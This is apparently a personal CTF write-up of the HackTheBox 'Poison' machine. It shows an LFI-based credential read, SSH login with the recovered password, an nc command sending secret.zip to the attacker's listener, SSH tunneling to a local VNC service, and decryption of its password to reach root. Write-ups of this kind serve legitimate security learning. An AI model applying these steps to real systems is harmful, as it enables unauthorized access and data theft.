imported>Aghanim at 14:04, 11 March 2022

2022-03-11T14:04:31Z

New page

{{Infobox WriteUp
| name = Poison
| platform = HackTheBox
| os = Linux
| difficulty = Medium
| techniques = LFI, VNC Tunneling
}}

[[File:2022-03-image-1.png|thumb]]

On this linux box I used a LFI vulnerability in the webserver to get a users password which was encoded 13 times with base64. After finding the password, we read /etc/password and found a username '''charix'''. Using that username and password I SSH into the machine. In Charix folder there was a secret.zip. After enumerating the machine I found that VNC is enabled on the machine and I port forwarded VNC to my machine. From there I used a script decrypt the password of the ZIP file. That password was used to connect to VNC as root.

----

== Enumeration ==

I'll start with NMAP scan.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen]
└─# nmap -p- -sC -sV --min-rate 10000 10.10.10.84 -oN nmap.ver
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-04 17:08 EST
Warning: 10.10.10.84 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.84
Host is up (0.041s latency).
Not shown: 52213 filtered tcp ports (no-response), 13320 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
</syntaxhighlight>

Only two ports open, '''22 '''and '''80. '''I notice that the Apache and OpenSSH is running on '''FreeBSD.'''

=== Port 80 ===

[[File:2022-03-Pasted-image-20220204231031.png|thumb]]

It looks like a website to test '''.php''' scripts. So I type in the different .php files listed on the site.

[[File:2022-03-Pasted-image-20220206215020.png|thumb]]

One of the files was interesting. This shows an array with files. Looking closely we can see that there is a txt file called '''pwdbackup.txt. '''

Typing that file in the URL we get an base64 encoded text.

[[File:2022-03-Pasted-image-20220206215221.png|thumb]]

=== Decoding password ===

From the text above we can see that it is ecoded atleast 13 times. So decoding it 13 times we end up with '''Charix!2#4%6&8(0'''.

[[File:2022-03-Pasted-image-20220206215203.png|thumb]]

=== LFI - Reading /etc/passwd ===

Now that we the password, we need a username. From the password we can see that the first 6 characters looks like a username. But I want to verify it. Since we know that there is an LFI vulnerability, we could try and read /etc/passwd.

[[File:2022-03-Pasted-image-20220204232310.png|thumb]]

== Initial Access ==

=== Shell as Charix ===

Now that we have a username and password we can SSH into the target machine.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen]
└─# ssh charix@10.10.10.84 255 ⨯
Enter passphrase for key '/root/.ssh/id_rsa':
(charix@10.10.10.84) Password for charix@Poison:
(charix@10.10.10.84) Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier

Edit /etc/motd to change this login announcement.
Want to use sed(1) to edit a file in place? Well, to replace every 'e' with
an 'o', in a file named 'foo', you can do:

sed -i.bak s/e/o/g foo

And you'll get a backup of the original in a file named 'foo.bak', but if you
want no backup:

sed -i '' s/e/o/g foo
charix@Poison:~ %
</syntaxhighlight>

=== Enumerate machine ===

Looking in Charix's folder, there is a zip file called '''secret.zip'''. I'll transfer that to my machine and analyze it. It dosent look useful to me as of now, so I'll continue to enumerate the machine.

<syntaxhighlight lang="bash">
charix@Poison:~ % nc 10.10.14.18 4444 -w 3 < secret.zip
</syntaxhighlight>

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen]
└─# nc -lvnp 4444 > secret.zip
listening on [any] 4444 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.84] 42937
</syntaxhighlight>

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen]
└─# unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
</syntaxhighlight>

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen]
└─# cat sdasd
��[|Ֆz!
</syntaxhighlight>

== Privilege Escalation ==

=== VNC server ===

Looking at what ports are running on the machine I notice that there are two ports that didnt show up in the NMAP scan. '''Port 5801 '''and '''port 5901. '''

<syntaxhighlight lang="bash">
charix@Poison:~ % netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 *.5802 *.* LISTEN
tcp4 0 0 *.5902 *.* LISTEN
tcp4 0 0 *.6002 *.* LISTEN

tcp4 0 0 10.10.10.84.ssh 10.10.14.18.32788 ESTABLISHED
tcp4 0 0 localhost.smtp *.* LISTEN
tcp4 0 0 *.http *.* LISTEN
tcp6 0 0 *.http *.* LISTEN
tcp4 0 0 *.ssh *.* LISTEN
tcp6 0 0 *.ssh *.* LISTEN
tcp4 0 0 localhost.5801 *.* LISTEN
tcp4 0 0 localhost.5901 *.* LISTEN
udp4 0 0 *.syslog *.*
udp6 0 0 *.syslog *.*
</syntaxhighlight>

After some googling; the 5901 is a VNC. So I'll port forward that port using SSH.

┌──(root💀kali)-[/home/aghanim]
└─# ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

</pre>

=== Cracking the zip file ===

Now that we know that there is VNC running on the machine, I'll use [https://github.com/trinitronx/vncpasswd.py trinitronx]'s script to decrypt the password of the zip file.

┌──(root💀kali)-[/home/…/Desktop/HTB/poisen/vncpasswd.py]
└─# python2 vncpasswd.py -d -f ../secret 1 ⨯
Decrypted Bin Pass= 'VNCP@$$!'
Decrypted Hex Pass= '564e435040242421'

</pre>

=== Shell as root ===

┌──(root💀kali)-[/home/aghanim]
└─# vncviewer localhost:5901 1 ⨯
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

</pre>

[[File:2022-03-Pasted-image-20220206222405.png|thumb]]

== What I've learned ==

* Sometimes clues found earlier on will be useful later on the enumeration. Dont get stuck on one thing too long, move forward and come back later after discovering new things. * Enumerating what running on the machine is important as that can lead to privilege escalation.

[[Category:HackTheBox]]
[[Category:Linux]]
[[Category:Write-ups]]

Write-ups/HTB/Poison - Revision history

imported>Aghanim at 14:04, 11 March 2022